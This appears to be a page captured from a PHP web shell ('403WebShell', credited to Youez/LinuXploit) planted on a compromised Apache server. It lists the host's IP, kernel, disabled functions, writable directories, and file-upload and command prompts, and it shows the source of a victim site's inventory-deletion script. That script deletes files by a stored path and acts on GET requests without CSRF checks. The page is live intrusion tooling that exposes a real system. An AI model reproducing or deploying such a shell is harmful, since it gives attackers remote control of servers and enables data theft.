Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/api/rented_inventory_delete.php
<?php
require_once __DIR__ . '/../../app/db.php';
require_once __DIR__ . '/../../app/helpers/auth.php';

// Only allow logged-in users with proper roles to delete
check_login();

// Optional: If you want to restrict delete to only Superadmins
// if (!is_superadmin()) { die("Access denied"); }

$pdo = db();

$id = $_GET['id'] ?? 0;
if (!$id) {
    die("Invalid request");
}

/* 1. FETCH RECORD DETAILS (For file deletion and logging) */
$stmt = $pdo->prepare("SELECT product_name, invoice_file FROM rented_inventory WHERE id = ?");
$stmt->execute([$id]);
$item = $stmt->fetch(PDO::FETCH_ASSOC);

if (!$item) {
    die("Record not found");
}

/* 2. DELETE INVOICE FILE FROM SERVER */
if (!empty($item['invoice_file'])) {
    // $_SERVER['DOCUMENT_ROOT'] ensures we find the absolute path to the 'public' folder
    $physicalPath = $_SERVER['DOCUMENT_ROOT'] . $item['invoice_file'];
    
    if (file_exists($physicalPath)) {
        unlink($physicalPath);
    }
}

/* 3. DELETE RECORD FROM DATABASE */
$delete = $pdo->prepare("DELETE FROM rented_inventory WHERE id = ?");
$result = $delete->execute([$id]);

/* 4. OPTIONAL: LOG ACTIVITY */
// If you have a logActivity function, it's good to track who deleted what
// logActivity("Rented Item Deleted", "Deleted item: " . $item['product_name'] . " (ID: $id)");

if ($result) {
    header("Location: /rented_inventory_list.php?deleted=1");
} else {
    header("Location: /rented_inventory_list.php?error=delete_failed");
}
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit